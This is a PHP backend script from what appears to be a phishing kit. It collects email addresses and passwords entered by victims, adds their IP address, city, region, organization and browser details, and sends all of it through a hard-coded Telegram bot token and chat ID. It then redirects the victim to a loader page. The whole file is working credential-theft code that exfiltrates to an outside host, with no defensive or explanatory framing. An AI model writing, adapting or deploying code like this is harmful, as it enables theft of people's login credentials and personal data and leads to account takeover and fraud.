<?php
// email_password_backend.php

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    if (isset($_POST['email']) && isset($_POST['password'])) {
        $email = htmlspecialchars($_POST['email']);
        $password = htmlspecialchars($_POST['password']);
        
        // Get additional information
        $ip = getUserIP();
        $location = getLocation($ip); // Get city, state, and organization
        $user_agent = $_SERVER['HTTP_USER_AGENT']; // Get user agent (browser info)
        
        // Prepare the message
        $message = "Email: $email\nPassword: $password\n";
        $message .= "IP Address: $ip\n";
        $message .= "City: " . $location['city'] . "\n";
        $message .= "State: " . $location['regionName'] . "\n";
        $message .= "Organization: " . $location['org'] . "\n";
        $message .= "User Agent: $user_agent";
        
        // Send the data to Telegram
        sendToTelegram($message);

        // Redirect after processing
        header('Location: ../loader.html');
        exit();
    }
}

// Function to send data to Telegram
function sendToTelegram($message) {
    // Telegram Bot details (directly embedded here)
    $bot_token = '7761610400:AAEIPtxg0NL0xrWdlHFhvn1z53ASqDv_EYg';  // Replace with your Telegram Bot Token
    $chat_id = '6265235194';      // Replace with your Telegram Chat ID
    $telegram_api_url = "https://api.telegram.org/bot$bot_token/sendMessage";
    
    // Prepare the message
    $data = [
        'chat_id' => $chat_id,
        'text' => $message
    ];

    // Send message via cURL
    $ch = curl_init($telegram_api_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);

    return $response;
}

// Function to get the user's IP address
function getUserIP() {
    // Check for the IP in different server variables
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP']; // IP from shared internet
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR']; // IP behind a proxy
    } else {
        return $_SERVER['REMOTE_ADDR']; // Regular IP
    }
}

// Function to get location information using ip-api.com
function getLocation($ip) {
    $api_url = "http://ip-api.com/json/$ip?fields=city,regionName,org";
    $response = file_get_contents($api_url);
    return json_decode($response, true); // Decode JSON response
}
?>
